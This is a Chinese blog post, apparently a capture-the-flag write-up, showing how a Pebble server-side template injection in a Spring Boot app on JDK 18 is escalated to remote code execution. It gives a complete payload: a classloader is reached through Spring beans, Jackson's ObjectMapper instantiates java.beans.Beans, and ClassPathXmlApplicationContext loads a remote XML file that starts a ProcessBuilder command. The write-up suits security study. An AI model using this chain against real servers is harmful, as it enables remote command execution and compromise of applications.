之后也算运气好,测了前几个就发现通过取得
internalCachingMetadataReaderFactory对象可以拿到classLoader
文章插图
因此有了这个我们便可以加载任意类了
{% set class1= beans.get("org.springframework.boot.autoconfigure.internalCachingMetadataReaderFactory").resourceLoader.classLoader.loadClass("xxxx") %}
但是我们需要获得一个类实例,但是我们不能去调用它的任何方法毕竟是class类,很好的一点是这里有jackson??,beans对象里也能直接获取到,解决一切问题{% set woshishuaibi =beans.get("jacksonObjectMapper").readValue("{}", class1) %}
因此我们能获得一个类的实例以后rce就相对“简单”了??,比如说ScriptEngineManager engineManager = new ScriptEngineManager();ScriptEngine engine = engineManager.getEngineByName("js");engine.eval("xxxx");
但题目当中环境是jdk18,发现engineManager.getEngineByName里面裤子都不剩了啥都没有,看来这个方法也是没用的,同时由于jackson实例化限制我们也不能直接实例化jshell
此时灵机一动我又想到两个类,它们实例化加载配置文件可以造成rce
- org.springframework.context.support.ClassPathXmlApplicationContext
- org.springframework.context.support.FileSystemXmlApplicationContext
AbstractPointcutAdvisor/AbstractApplicationContext这两个类的都不行,心里xxx
文章插图
这时候怎么办呢?那classpath下有没有某个类可以帮助我们实例化任意对象呢?
另类绕过Jackson黑名单限制当然有哒!也就是java.beans.Beans类,这个类可以帮助我们实例化任意方法
public static Object instantiate(ClassLoader cls, String beanName) throws IOException, ClassNotFoundException {return Beans.instantiate(cls, beanName, null, null);}
这里的参数cls可以不传,为null则会默认调用ClassLoader.getSystemClassLoader();获取一个classloader
public static Object instantiate(ClassLoader cls, String beanName,BeanContext beanContext,AppletInitializer initializer)throws IOException, ClassNotFoundException {InputStream ins;ObjectInputStream oins = null;Object result = null;boolean serialized = false;IOException serex = null;// If the given classloader is null, we check if an// system classloader is available and (if so)// use that instead.// Note that calls on the system class loader will// look in the bootstrap class loader first.if (cls == null) {try {cls = ClassLoader.getSystemClassLoader();} catch (SecurityException ex) {// We're not allowed to access the system class loader.// Drop through.}}
之后的逻辑我们不需要关注那个二次反序列化的部分,在后面可以看到可以实例化任意public修饰的构造方法if (result == null) {// No serialized object, try just instantiating the classClass<?> cl;try {cl = ClassFinder.findClass(beanName, cls);} catch (ClassNotFoundException ex) {// There is no appropriate class.If we earlier tried to// deserialize an object and got an IO exception, throw that,// otherwise rethrow the ClassNotFoundException.if (serex != null) {throw serex;}throw ex;}if (!Modifier.isPublic(cl.getModifiers())) {throw new ClassNotFoundException("" + cl + " : no public access");}/** Try to instantiate the class.*/try {result = cl.newInstance();} catch (Exception ex) {// We have to remap the exception to one in our signature.// But we pass extra information in the detail message.throw new ClassNotFoundException("" + cl + " : " + ex, ex);}}
最终构造实现RCE最终模板文件构造{% set y= beans.get("org.springframework.boot.autoconfigure.internalCachingMetadataReaderFactory").resourceLoader.classLoader.loadClass("java.beans.Beans") %}{% set yy =beans.get("jacksonObjectMapper").readValue("{}", y) %}{% set yyy = yy.instantiate(null,"org.springframework.context.support.ClassPathXmlApplicationContext") %}{{ yyy.setConfigLocation("http://xxxx/1.xml") }}{{ yyy.refresh() }}
1.xml<?xml version="1.0" encoding="UTF-8" ?><beans xmlns="http://www.springframework.org/schema/beans"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"><bean id="pb" class="java.lang.ProcessBuilder" init-method="start"><constructor-arg ><list><value>open</value><value>-a</value><value>calculator</value></list></constructor-arg></bean></beans>
推荐阅读
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 军棋的规则和走法 军棋的下法
- 通草鸡汤下奶吗
- 袁泉|袁泉,终于从神坛上 下来了
- 防晒|马化腾的企鹅“瘦身了”,收入下滑,但是员工平均工资8.5万以上
- 登月|中国长征系列火箭创下新纪录:2030年左右载人登月!
- |职场上为什么看似和颜悦色,其实心思已经在暗处下套
- 有品位的女人,有以下几种行为 品味女人
- 乾隆谕旨下的锡伯族西迁史 锡伯族西迁
- 如何下载滴滴出行?网约车司机端下载方法对比,总有一种你可以下载
- 滴滴出行司机端安卓和苹果的都是这样下载的,只是你没找对注册方法。